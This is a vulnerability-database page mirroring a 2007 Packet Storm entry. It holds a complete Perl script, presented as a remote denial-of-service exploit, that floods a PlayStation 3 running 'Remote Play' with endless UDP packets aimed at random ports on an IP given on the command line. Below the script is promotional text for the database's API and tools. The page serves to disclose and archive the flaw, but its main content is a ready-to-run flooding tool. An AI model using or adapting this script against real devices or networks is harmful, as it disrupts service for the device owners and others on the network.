Lucene search
K

ps3rpdos.pl.txt

🗓️ 27 Mar 2007 00:00:00Reported by Dark_KType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 17 Views

Playstation 3 "Remote Play" Remote DoS Exploit, UDP flood causes denial of servic

Code
`#!/usr/bin/perl  
  
####.:Playstation 3 "Remote Play" Remote DoS Exploit:.####  
#  
# A UDP flood while the "remote play" feature is active  
# will result in a denial of service condition.   
#  
# Tested using PS3 v1.60 (20GB) & PSP v3.10 OE-A  
#  
# -Dark_K <mak0b[AT]inbox.com>  
#   
# POC code is based on odix's perl udp flooder  
##########################################################  
  
use Socket;  
  
$ARGC=@ARGV;  
  
if ($ARGC !=1) {  
printf "usage: ./ps3rpdos.pl <ip>\n";  
exit(1);  
}  
  
socket(crazy, PF_INET, SOCK_DGRAM, 17);  
$iaddr = inet_aton("$ARGV[0]");  
  
printf "Sending...\n";  
  
for (;;) {  
$size=$rand x $rand x $rand;  
$port=int(rand 65000) +1;  
send(crazy, 0, $size, sockaddr_in($port, $iaddr));  
}  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4
17